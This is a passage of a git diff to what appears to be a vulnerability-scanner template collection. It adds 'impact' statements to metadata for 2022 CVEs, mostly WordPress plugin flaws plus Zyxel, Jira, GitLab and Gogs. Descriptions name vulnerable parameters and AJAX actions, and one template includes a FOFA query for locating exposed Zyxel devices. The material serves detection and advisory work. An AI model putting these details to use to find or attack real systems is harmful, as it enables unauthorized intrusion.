7e67e03d78..eaa1020e45 100644 --- a/http/cves/2022/CVE-2022-0165.yaml +++ b/http/cves/2022/CVE-2022-0165.yaml @@ -5,6 +5,8 @@ info: author: akincibor severity: medium description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users). + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks. remediation: | Update to the latest version of KingComposer (>=2.9.7) to fix the open redirect vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index ebbe09c335..9bf97cd21e 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: This is resolved in release 1.6.0. reference: - https://wpscan.com/vulnerability/0b4d870f-eab8-4544-91f8-9c5f0538709c diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index bc46b2f168..20ea81babc 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDK severity: medium description: WordPress RSS Aggregator < 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting. + impact: | + An attacker with authenticated access can inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update WordPress RSS Aggregator plugin to version 4.20 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml index b498c6d3b8..7e376ff46a 100644 --- a/http/cves/2022/CVE-2022-0201.yaml +++ b/http/cves/2022/CVE-2022-0201.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to WordPress Permalink Manager version 2.2.15 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index 5f96ef9dd5..57ee40432e 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress NewStatPress plugin before 1.3.6 is susceptible to cross-site scripting. The plugin does not properly escape the whatX parameters before outputting them back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.3.6. reference: - https://wpscan.com/vulnerability/ce12437a-d440-4c4a-9247-95a8f39d00b9 diff --git a/http/cves/2022/CVE-2022-0208.yaml b/http/cves/2022/CVE-2022-0208.yaml index 7cdc2ce04f..89bbdc5dca 100644 --- a/http/cves/2022/CVE-2022-0208.yaml +++ b/http/cves/2022/CVE-2022-0208.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of MapPress (2.73.4 or higher) or apply the vendor-provided patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index 2a2255bd12..4d342771a8 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WorsPress Spider Calendar plugin through 1.5.65 is susceptible to cross-site scripting. The plugin does not sanitize and escape the callback parameter before outputting it back in the page via the window AJAX action, available to both unauthenticated and authenticated users. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of WordPress Spider Calendar plugin (>=1.5.66) or apply the vendor-supplied patch to fix the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0218.yaml b/http/cves/2022/CVE-2022-0218.yaml index fd64c0d284..d21f50bce0 100644 --- a/http/cves/2022/CVE-2022-0218.yaml +++ b/http/cves/2022/CVE-2022-0218.yaml @@ -5,6 +5,8 @@ info: author: hexcat severity: medium description: WordPress Email Template Designer WP HTML Mail allows stored cross-site scripting through an unprotected REST-API endpoint. + impact: | + An attacker can exploit this vulnerability to inject malicious scripts into the subject field of an email template, potentially leading to unauthorized access, data theft, or further compromise of the affected system. remediation: | Update to version 3.1 or later of the HTML Email Template Designer plugin to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index e60e7817f2..d4a4fa7338 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress GDPR & CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type, and JavaScript code may be executed on a victim's browser. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Version 1.9.26 has added a CSRF check. This vulnerability is only exploitable against unauthenticated users. reference: - https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059 diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml index dd7ca01825..251e53c347 100644 --- a/http/cves/2022/CVE-2022-0234.yaml +++ b/http/cves/2022/CVE-2022-0234.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WOOCS plugin before 1.3.7.5 is susceptible to cross-site scripting. The plugin does not sanitize and escape the woocs_in_order_currency parameter of the woocs_get_products_price_html AJAX action, available to both unauthenticated and authenticated users, before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update the WordPress WOOCS plugin to version 1.3.7.5 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index a91f6d4685..81cd2e6247 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade LearnPress to version 4.1.6 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index cdc399aafb..a9dc706611 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11. + impact: | + Successful exploitation of this vulnerability can lead to the exposure of sensitive data, such as user credentials or database information. remediation: | Apply the latest security patch or update provided by the Microweber CMS vendor to fix the information disclosure vulnerability (CVE-2022-0281). reference: diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index 59ccc4121a..8092099116 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing attackers to execute malicious scripts in the context of the victim's browser. remediation: Fixed in version 2.7.12 reference: - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index cf0bc52b82..05fbf975d2 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -5,13 +5,13 @@ info: author: SleepingBag945,Powerexploit severity: critical description: | - An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device. + An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device. reference: - https://github.com/gobysec/GobyVuls/blob/master/CVE-2022-0342.md - https://nvd.nist.gov/vuln/detail/CVE-2022-0342 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: body="/2FA-access.cgi" && body="zyxel zyxel_style1" tags: cve,cve2022,zyxel,auth-bypass,router diff --git a/http/cves/2022/CVE-2022-0346.yaml b/http/cves/2022/CVE-2022-0346.yaml index 5f0345c088..31708457f8 100644 --- a/http/cves/2022/CVE-2022-0346.yaml +++ b/http/cves/2022/CVE-2022-0346.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on. + impact: | + Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code on the affected system or inject malicious scripts into web pages viewed by users. remediation: | Update the WordPress XML Sitemap Generator for Google plugin to version 2.0.4 or later to mitigate the XSS and RCE vulnerabilities. reference: diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index 264b477420..a00662df88 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Update to the latest version of the WordPress NotificationX plugin (2.3.9 or higher) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index 5507b7f9ce..72b69a65fa 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a version that has addressed the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index bb22e2e1af..f4f0e5f703 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Embed Swagger plugin 1.0.0 and prior contains a reflected cross-site scripting vulnerability due to insufficient escaping/sanitization and validation via the url parameter found in the ~/swagger-iframe.php file, which allows attackers to inject arbitrary web scripts onto the page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Embed Swagger plugin (1.0.0) or apply a patch provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml index 5f6fc921df..8d8862e290 100644 --- a/http/cves/2022/CVE-2022-0412.yaml +++ b/http/cves/2022/CVE-2022-0412.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress TI WooCommerce Wishlist plugin before 1.40.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: | Update to the latest version of the TI WooCommerce Wishlist plugin (1.40.1 or higher). reference: diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index 207b99b64d..d50fffad3b 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Gogs before 0.12.6 is susceptible to remote command execution via the uploading repository file in GitHub repository gogs/gogs. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: Fixed in version 0.12.6. reference: - https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284 diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index 986bbb9ee5..dda9fa6013 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to WordPress White Label CMS plugin version 2.2.9 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index 8dc3b1c1fe..4ea97c5dba 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: The GitHub repository mastodon/mastodon prior to 3.5.0 contains a Prototype Pollution vulnerability. + impact: | + Remote code execution remediation: | Apply the latest security patches and updates provided by the Mastodon project to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index 1640243c18..ace30701b5 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability. It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: | Update to the latest version of the WordPress Page Views Count plugin (2.4.15) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0437.yaml b/http/cves/2022/CVE-2022-0437.yaml index ddefe92a4b..4cb00b8764 100644 --- a/http/cves/2022/CVE-2022-0437.yaml +++ b/http/cves/2022/CVE-2022-0437.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: NPM karma prior to 6.3.14. contains a DOM-based cross-site Scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of karma-runner that includes proper input sanitization to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml index 197bc2aabf..b168fe8249 100644 --- a/http/cves/2022/CVE-2022-0441.yaml +++ b/http/cves/2022/CVE-2022-0441.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially compromising user data and system integrity. remediation: | Upgrade to the latest version of the MasterStudy LMS plugin (2.7.6 or higher) to fix the improper access control issue. reference: diff --git a/http/cves/2022/CVE-2022-0482.yaml b/http/cves/2022/CVE-2022-0482.yaml index 819fb3bd5c..0f12d027b0 100644 --- a/http/cves/2022/CVE-2022-0482.yaml +++ b/http/cves/2022/CVE-2022-0482.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive data or perform unauthorized actions. remediation: | Upgrade Easy!Appointments to version 1.4.4 or above to fix the Broken Access Control vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml index ebf16bbaa9..68582e3ac8 100644 --- a/http/cves/2022/CVE-2022-0535.yaml +++ b/http/cves/2022/CVE-2022-0535.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress E2Pdf plugin before 1.16.45 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, even when the unfiltered_html capability is disallowed. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, making it possible to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update the WordPress E2Pdf plugin to version 1.16.45 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml index 16add28a26..a6ef2e7d04 100644 --- a/http/cves/2022/CVE-2022-0540.yaml +++ b/http/cves/2022/CVE-2022-0540.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, modification of data, and potential disruption of business operations. remediation: Ensure you are using the latest version and that all security patches have been applied. reference: - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index d5ce387354..d747eb3d73 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users. + impact: | + An attacker can send crafted requests to the server, potentially leading to unauthorized access to internal resources or network scanning. remediation: | Upgrade to Formcraft3 version 3.8.28 or later to fix the SSRF vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0594.yaml b/http/cves/2022/CVE-2022-0594.yaml index 5723836d28..227ddc686c 100644 --- a/http/cves/2022/CVE-2022-0594.yaml +++ b/http/cves/2022/CVE-2022-0594.yaml @@ -5,6 +5,8 @@ info: author: atomiczsec severity: medium description: WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.). + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Update the Shareaholic plugin to version 9.7.6 or later to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0595.yaml b/http/cves/2022/CVE-2022-0595.yaml index d7f8306b69..6535dba5b2 100644 --- a/http/cves/2022/CVE-2022-0595.yaml +++ b/http/cves/2022/CVE-2022-0595.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Contact Form 7 before 1.3.6.3 contains an unauthenticated stored cross-site scripting vulnerability in the Drag and Drop Multiple File Upload plugin. SVG files can be uploaded by default via the dnd_codedropz_upload AJAX action. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. remediation: | Update the WordPress Contact Form 7 plugin to version 1.3.6.3 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index 78ad436fba..18d87067da 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Mapping Multiple URLs Redirect Same Page plugin (version 5.8 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml index 9cd9df8a14..5f01e3d1af 100644 --- a/http/cves/2022/CVE-2022-0653.yaml +++ b/http/cves/2022/CVE-2022-0653.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Upgrade to version 3.6.5 or later. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653 diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index 0dd691838f..bf89ac7fc6 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -5,6 +5,8 @@ info: author: akincibor severity: high description: uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc). + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Upgrade uDraw to version 3.3.3 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index e2424de0d1..271784ef50 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. remediation: | Upgrade Microweber to version 1.2.11 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index 98be7352f2..68362d634c 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade Microweber CMS to version 1.2.11 or later, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0679.yaml b/http/cves/2022/CVE-2022-0679.yaml index fd1fce7c9e..939413f61f 100644 --- a/http/cves/2022/CVE-2022-0679.yaml +++ b/http/cves/2022/CVE-2022-0679.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration. + impact: | + The vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Update to the latest version of the WordPress Narnoo Distributor plugin (>=2.5.2) to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml index 1b86f1d7bc..272963374f 100644 --- a/http/cves/2022/CVE-2022-0692.yaml +++ b/http/cves/2022/CVE-2022-0692.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware. remediation: | Upgrade to version 3.0.1 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 92d6328b43..0debdbc2d0 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Master Elements plugin through 8.0 contains a SQL injection vulnerability. The plugin does not validate and escape the meta_ids parameter of its remove_post_meta_condition AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. remediation: | Update to the latest version of WordPress Master Elements plugin (>=8.1) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index be212e1c03..3ac9b81844 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -5,6 +5,8 @@ info: author: GitLab Red Team severity: critical description: GitLab CE/EE is susceptible to information disclosure. An attacker can access runner registration tokens using quick actions commands, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are from 12.10 before 14.6.5, from 14.7 before 14.7.4, and from 14.8 before 14.8.2. + impact: | + An attacker can gain access to sensitive information stored in GitLab. remediation: | Apply the necessary patches or updates provided by GitLab to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index 4123edc774..21539a4cc7 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Infographic Maker WordPress plugin before 4.3.8 does not validate and escape the post_id parameter before using it in a SQL statement via the qcld_upvote_action AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL Injection. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the WordPress site. remediation: Fixed in version 4.3.8 reference: - https://wpscan.com/vulnerability/a8575322-c2cf-486a-9c37-71a22167aac3 diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml index b8940f94fd..784abebcb8 